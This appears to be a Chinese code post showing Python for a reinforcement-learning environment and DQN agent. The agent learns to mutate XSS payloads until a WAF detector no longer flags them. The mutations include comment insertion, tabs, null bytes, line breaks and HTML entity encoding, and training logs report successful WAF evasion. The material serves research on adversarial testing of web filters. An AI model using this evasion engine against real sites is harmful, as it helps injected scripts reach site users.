参考:https://github.com/duoergun0729/3book/tree/master/code/gym-waf
代码:
wafEnv.py
#-*- coding:utf-8 –*-import numpy as npimport reimport randomfrom gym import spacesimport gymfrom sklearn.model_selection import train_test_split#samples_file="xss-samples.txt"samples_file="xss-samples-all.txt"samples=[]with open(samples_file) as f: for line in f: line = line.strip('\n') print("Add xss sample:" + line) samples.append(line)# 划分训练和测试集合samples_train, samples_test = train_test_split(samples, test_size=0.4)class Xss_Manipulator(object): def __init__(self): self.dim = 0 self.name="" #常见免杀动作: # 随机字符转16进制 比如: a转换成a; # 随机字符转10进制 比如: a转换成a; # 随机字符转10进制并假如大量0 比如: a转换成a; # 插入注释 比如: /*abcde*/ # 插入Tab # 插入回车 # 开头插入空格 比如: /**/ # 大小写混淆 # 插入 \00 也会被浏览器忽略 ACTION_TABLE = { #'charTo16': 'charTo16', #'charTo10': 'charTo10', #'charTo10Zero': 'charTo10Zero', 'addComment': 'addComment', 'addTab': 'addTab', 'addZero': 'addZero', 'addEnter': 'addEnter', } def charTo16(self,str,seed=None): #print("charTo16") matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #print("search --> matchObj.group() : ", matchObjs) modify_char=random.choice(matchObjs) #字符转ascii值ord(modify_char #modify_char_10=ord(modify_char) modify_char_16="&#{};".format(hex(ord(modify_char))) #print("modify_char %s to %s" % (modify_char,modify_char_10)) #替换 str=re.sub(modify_char, modify_char_16, str,count=random.randint(1,3)) return str def charTo10(self,str,seed=None): #print("charTo10") matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #print("search --> matchObj.group() : ", matchObjs) modify_char=random.choice(matchObjs) #字符转ascii值ord(modify_char #modify_char_10=ord(modify_char) modify_char_10="&#{};".format(ord(modify_char)) #print("modify_char %s to %s" % (modify_char,modify_char_10)) #替换 str=re.sub(modify_char, modify_char_10, str) return str def charTo10Zero(self,str,seed=None): #print("charTo10") matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #print("search --> matchObj.group() : ", matchObjs) modify_char=random.choice(matchObjs) #字符转ascii值ord(modify_char #modify_char_10=ord(modify_char) modify_char_10=" {};".format(ord(modify_char)) #print("modify_char %s to %s" % (modify_char,modify_char_10)) #替换 str=re.sub(modify_char, modify_char_10, str) return str def addComment(self,str,seed=None): #print("charTo10") matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #选择替换的字符 modify_char=random.choice(matchObjs) #生成替换的内容 #modify_char_comment="{}/*a{}*/".format(modify_char,modify_char) modify_char_comment = "{}/*8888*/".format(modify_char) #替换 str=re.sub(modify_char, modify_char_comment, str) return str def addTab(self,str,seed=None): #print("charTo10") matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #选择替换的字符 modify_char=random.choice(matchObjs) #生成替换的内容 modify_char_tab=" {}".format(modify_char) #替换 str=re.sub(modify_char, modify_char_tab, str) return str def addZero(self,str,seed=None): #print("charTo10") matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #选择替换的字符 modify_char=random.choice(matchObjs) #生成替换的内容 modify_char_zero="\\00{}".format(modify_char) #替换 str=re.sub(modify_char, modify_char_zero, str) return str def addEnter(self,str,seed=None): #print("charTo10") matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #选择替换的字符 modify_char=random.choice(matchObjs) #生成替换的内容 modify_char_enter="\\r\\n{}".format(modify_char) #替换 str=re.sub(modify_char, modify_char_enter, str) return str def modify(self,str, _action, seed=6): print("Do action :%s" % _action) action_func=Xss_Manipulator().__getattribute__(_action) return action_func(str,seed)ACTION_LOOKUP = {i: act for i, act in enumerate(Xss_Manipulator.ACTION_TABLE.keys())}#
主代码:
#-*- coding:utf-8 –*-import gymimport timeimport randomimport gym_waf.envs.wafEnvimport pickleimport numpy as npfrom keras.models import Sequentialfrom keras.layers import Dense, Activation, Flatten, ELU, Dropout, BatchNormalizationfrom keras.optimizers import Adam, SGD, RMSpropfrom rl.agents.dqn import DQNAgentfrom rl.agents.sarsa import SarsaAgentfrom rl.policy import EpsGreedyQPolicyfrom rl.memory import SequentialMemoryfrom gym_waf.envs.wafEnv import samples_test,samples_train# from gym_waf.envs.features import Featuresfrom gym_waf.envs.waf import Waf_Checkfrom gym_waf.envs.xss_manipulator import Xss_Manipulatorfrom keras.callbacks import TensorBoardENV_NAME = 'Waf-v0'#尝试的最大次数nb_max_episode_steps_train=50nb_max_episode_steps_test=3ACTION_LOOKUP = {i: act for i, act in enumerate(Xss_Manipulator.ACTION_TABLE.keys())}class Features(object): def __init__(self): self.dim = 0 self.name="" self.dtype=np.float32 def byte_histogram(self,str): #bytes=np.array(list(str)) bytes=[ord(ch) for ch in list(str)] #print(bytes) h = np.bincount(bytes, minlength=256) return np.concatenate([ [h.sum()], # total size of the byte stream h.astype(self.dtype).flatten() / h.sum(), # normalized the histogram ]) def extract(self,str): featurevectors = [ [self.byte_histogram(str)] ] return np.concatenate(featurevectors)def generate_dense_model(input_shape, layers, nb_actions): model = Sequential() model.add(Flatten(input_shape=input_shape)) model.add(Dropout(0.1)) for layer in layers: model.add(Dense(layer)) model.add(BatchNormalization()) model.add(ELU(alpha=1.0)) model.add(Dense(nb_actions)) model.add(Activation('linear')) print(model.summary()) return modeldef train_dqn_model(layers, rounds=10000): env = gym.make(ENV_NAME) env.seed(1) nb_actions = env.action_space.n window_length = 1 print("nb_actions:") print(nb_actions) print("env.observation_space.shape:") print(env.observation_space.shape) model = generate_dense_model((window_length,) + env.observation_space.shape, layers, nb_actions) policy = EpsGreedyQPolicy() memory = SequentialMemory(limit=256, ignore_episode_boundaries=False, window_length=window_length) agent = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=16, enable_double_dqn=True, enable_dueling_network=True, dueling_type='avg', target_model_update=1e-2, policy=policy, batch_size=16) agent.compile(RMSprop(lr=1e-3), metrics=['mae']) #tb_cb = TensorBoard(log_dir='/tmp/log', write_images=1, histogram_freq=1) #cbks = [tb_cb] # play the game. learn something! #nb_max_episode_steps 一次学习周期中最大步数 agent.fit(env, nb_steps=rounds, nb_max_episode_steps=nb_max_episode_steps_train,visualize=False, verbose=2) #print("#################Start Test%################") #agent.test(env, nb_episodes=100) test_samples=samples_test features_extra = Features() waf_checker = Waf_Check() # 根据动作修改当前样本免杀 xss_manipulatorer = Xss_Manipulator() success=0 sum=0 shp = (1,) + tuple(model.input_shape[1:]) for sample in samples_test: #print(sample) sum+=1 for _ in range(nb_max_episode_steps_test): if not waf_checker.check_xss(sample) : success+=1 print(sample) break f = features_extra.extract(sample).reshape(shp) act_values = model.predict(f) action=np.argmax(act_values[0]) sample=xss_manipulatorer.modify(sample,ACTION_LOOKUP[action]) print("Sum:{} Success:{}".format(sum,success)) return agent, modelif __name__ == '__main__': agent1, model1= train_dqn_model([5, 2], rounds=1000) model1.save('waf-v0.h5', overwrite=True)
效果:
reset current_sample=Do action :addEnterDo action :addCommentGood!!!!!!!avoid waf: 987/1000: episode: 221, duration: 0.016s, episode steps: 2, steps per second: 122, episode reward: 10.000, mean reward: 5.000 [0.000, 10.000], mean action: 1.500 [0.000, 3.000], mean observation: 0.179 [0.000, 53.000], loss: 1.608465, mean_absolute_error: 3.369818, mean_q: 7.756353reset current_sample= Do action :addEnterDo action :addEnterDo action :addEnterDo action :addZeroDo action :addEnterDo action :addEnterDo action :addEnterDo action :addEnterDo action :addEnterGood!!!!!!!avoid waf: